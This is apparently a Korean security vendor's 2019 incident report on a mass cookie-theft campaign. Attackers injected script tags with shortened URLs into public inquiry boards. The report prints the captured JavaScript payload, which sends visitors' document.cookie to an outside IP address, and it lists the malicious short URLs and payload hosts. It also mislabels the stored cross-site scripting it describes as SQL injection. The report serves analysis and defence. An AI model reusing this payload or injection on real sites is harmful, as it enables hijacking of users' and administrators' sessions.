sim

웹 사이트 침해 동향 보고서

?

단축키

Prev이전 문서

Next다음 문서

크게 작게 위로 아래로 댓글로 가기 인쇄 첨부
?

단축키

Prev이전 문서

Next다음 문서

크게 작게 위로 아래로 댓글로 가기 인쇄 첨부

해당 보고서는 2019.07.27에 작성되었으며 보고서의 내용은

PoisonEye에서 탐지한 결과를 근거로 작성되었습니다.


  1. 서론
    • 단축 URL 공격 이슈
  2. 개요
    • 단축 URL 이란 ?
    • 공격자는 왜 단축 URL을 사용 하였는가 ?
  3. 분석 내용
    • 공격 시나리오
    • URL 분석
    • 삽입된 공격 내용 분석
  4. 영향
    • 특이점
    • 피해량
  5. 대응 방법
    • 탐지 서비스 이용
    • 자체 진단

악성코드 경로 [과거 미포함]

경유지 최종지 페이로드
http://kks.me/brqYV 91.204.225.153/fa.js 91.204.225.153/index.php
http://c7.gg/fEX57 27.255.64.33/h2.js 27.255.64.33/index.php

 

  • 단축 URL 공격 이슈

2019 상반기 웹사이트 침해로 단축 URL을 이용한 쿠키탈취 공격이 행해졌다.

 

포이즌아이에서는 5월 14일 해당 공격을 탐지 하였고, 이전에도 단축 URL을 이용한 공격이 많았으나, 다시끔 같은 공격 기술을 번복하여 공격한 이슈이다.

 

해당 공격은 접근한 사용자의 쿠키(cookie)를 탈취하고 있으며, java script를 이용하여 외부 페이지에 내용이 저장된다.

 

short_url_issue1.jpg

[그림 1. 단축 url 공격 삽입 일부]

 

  • 단축 URL 이란 ?

단축 URL은 접근성이 불편한 긴 웹사이트 주소를 짧게 줄여주는 일종의 리다이렉션/포워딩 서비스 이다.

예를 들면, http://xxxx.com/view.php?id=21&board=freeboard&flag=1과 같은 긴 주소를 짧게, goo.gl/Sudhac 처럼 바꾸어 단축 시켜준다.

 

이점은 상당히 많고, 서비스도 다양해서 짧은 주소를 이용하여 소셜에 이용되거나 사용자의 접근성을 높히고 참여도를 유도하기도 한다.

 

  • 공격자는 왜 단축 URL을 사용 하였는가 ?

해당 공격에서 단축 URL을 사용한 이유는 공격 방식에 따른 편의성으로 생각 할 수 있다.

 

공격자는 아래와 같이 단순한 코드를 집어 넣으면서, 무작위로 공격한 이슈이고 게시글 특성상 문자수를 제한하는 곳이 있기 때문에 여러가지 요소때문에 사용한 것으로 보인다.

 

<script src="http://XXX.XX/buYSTD"></script>

 

이러한 단순한 공격은 현재로써의 과거 2000년대 중반에 자주 사용되었는데, 이는 sql injection 공격의 일종으로  MASS SQL injection 공격이다.

 

현재 웹 사이트들이 가장 피해량이 많고, 가장 광범위하게 사용되는 공격 방식이다.

 

구식의 공격방식이지만 고질적인 문제는 고쳐지지 않고 있으며, 요즘에는 대부분 injection의 위험성을 인지하고 있기 때문에, 최소화 되어있을 뿐 이다.

 

  • 공격 시나리오

게시글 제목에 공격 문구 삽입, 해당 코드가 실행되면 쿠키탈취가 이루어진다.

스크린샷 2019-07-27 오전 10.00.58.png

[그림 2. 최근 게시물에 삽입된 공격 코드]

 

 

스크린샷 2019-07-27 오전 10.00.33.png

[그림 3. 공격 구문이 실행되면서 외부로 전송되는 쿠키값]

 

  • URL 분석

가장 파급력이 큰 URL을 기준으로 아래와 같은 리다이렉션을 보이고 있다.

 

->http://kks.me/brqYV [접속]

-->91.204.225.153/fa.js [자바스크립트 코드]

--->91.204.225.153/index.php?cookie=(쿠키 값) [최종 쿠키 저장]

 

해당 페이지의 호스트는 국내로 확인되었으며, 추가적으로 아래와 같은 의심스러운 URL이 있는 것을 확인하였다.

 

 

  • 삽입된 공격 내용 분석

스크린샷 2019-07-27 오전 5.05.03.png

[그림 2. 유포지에 삽입되있는 모습]

 

해당 스크립트를 보면 "급급급 문의 <script src="http://kks.me/brqYV"></script>"라고 게시글이 쓰여져 있는 것을 볼 수 있다.

 

여기서 웹 페이지는 "급급급 문의"부분을 텍스트로 인식하고, 남어지 뒷 부분 스크립트 로드부분은 태그로 인식하여 개별적으로 작동하게 끔 되어있다.

 

이로 인하여 해당 페이지가 열리는 순간 스크립트가 로드됨과 동시에 작동 할 수 있다.

 

var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://91.204.225.153/index.php?cookie='+encodeURIComponent(document.cookie);

[스크립트 2. fa.js에 삽입된 소스]

 

매우 간단한 스크립트 이다.

 

해당 소스에서 공격 환경에 맞추기 위한 부분은 빨간색으로 표시했으며, 핵심이 되는 부분은 녹색으로 표시했다.

 

가장 중요한건 encodeURIComponent(document.cookie);부분이다.

 

함수를 나눠서 살펴보면, document.cookie함수는 환경 변수에 등록되있는 현재 접근한 사용자의 cookie를 표시해 준다 이후 encodeURIComponent함수를 거쳐 데이터형으로 변환되게 된다.

 

그 다음 index.php파일에 cookie인자값헤 데이터형으로 변환된 쿠키를 넣어 php파일에 처리되는 내용에 따라 쿠키가 저장되거나, 다른곳으로 전송될 수 있다.

 

  • 특이점

해당 공격은 특정 웹 사이트를 겨냥한 것도 아니며, 특정 층을 노린 공격이도 아닌 무작위의 공격으로 보인다.

 

크롤러를 이용한 자동화 공격으로 보이며, 해당 공격이 적용된 곳은 대부분 문의 게시판, 질문 게시판 등 회원가입이 이루어지지 않아도 게시글을 쓸 수 있는 곳에 올려졌다는 것 이다.

 

내용이 차별화 되어있는 것도 아니며, 고정된 내용에 해당 공격 방법이 적용되지 않은 웹 사이트에서도 게시글이 삭제되거나 수정되는 흔적이 없는 것으로 보아 무작위 공격으로 보인다.

 

  • 피해량

해당 방식의 공격은 몇 년전 부터 공격된 방식이다. 

공격이 진행된 웹 사이트에는 레거시로 남아있는 경우도 있고, 현재까지도 탈취가 진행되고 있는 것으로 확인되었는데, 해당 공격의 흔적을 처리하지 않으며, 다시끔 공격이 가능할 수 있으며 잠재적 악성코드 유포지로 재사용 될 수 있다.

 

근본적으로 과거부터 현재까지의 피해량은 아래와 같다.

 

악성 URL 유포지 수
http://kks.me/brqYV 428
http://c7.gg/fEX57 372
http://kks.me/aUYCK 212
http://u6.gg/cXFwy 237
http://u6.gg/aHw3R 232
http://kks.me/a3Lh9 125
http://u6.gg/f8fDh 114

 

최근 피해량은 약 1400개의 사이트에서 유포했으며, 모두 쿠키탈취로 확인 되었다.

 

탈취된 쿠키의 수는 약 2217000개 이며, 이중 관리자 권한을 가진 쿠키도 다수 발견되었다.

 

해당 쿠키의 평문에 관리자 아이디를 대조하여 조사되었으며 정확한 숫자는 더 많을 것 으로 예상된다

 

  • 대응 방법

기본적으로 홈페이지를 관리하는 방법은 취약점 점검 서비스를 이용 하거나 주기적인 모니터링을 해주는 얼럿 서비스를 받는 방법이 있다.

 

해당 관련한 서비스는 악성코드 모니터링/탐지 서비스를 하는 업체가 많으므로, 검색 시 많은 내용을 찾을 수 있다.

 

또 다른 방법은 자체적으로 진단하여 해당 스크립트를 찾고 의심스러운 스크립트를 제거하는 방법으로 진행하면 된다.

 

해당 방법은 기술적으로나 인력자원의 소모가 크므로 솔루션을 이용하는 것이 바람직 하다.

 

 

Copyright PoisonEye


  1. [2019.07.27] 단축 URL을 이용한 MASS SQL injection 공격 보고서

    해당 보고서는 2019.07.27에 작성되었으며 보고서의 내용은 PoisonEye에서 탐지한 결과를 근거로 작성되었습니다. 서론 단축 URL 공격 이슈 개요 단축 URL 이란 ? 공격자는 왜 단축 URL을 사용 하였는가 ? 분석 내용 공격 시나리오 URL 분석 삽입된 공격 내용...
    Date2019.07.27 By관리자 Views281
    Read More
목록
Board Pagination Prev 1 Next
/ 1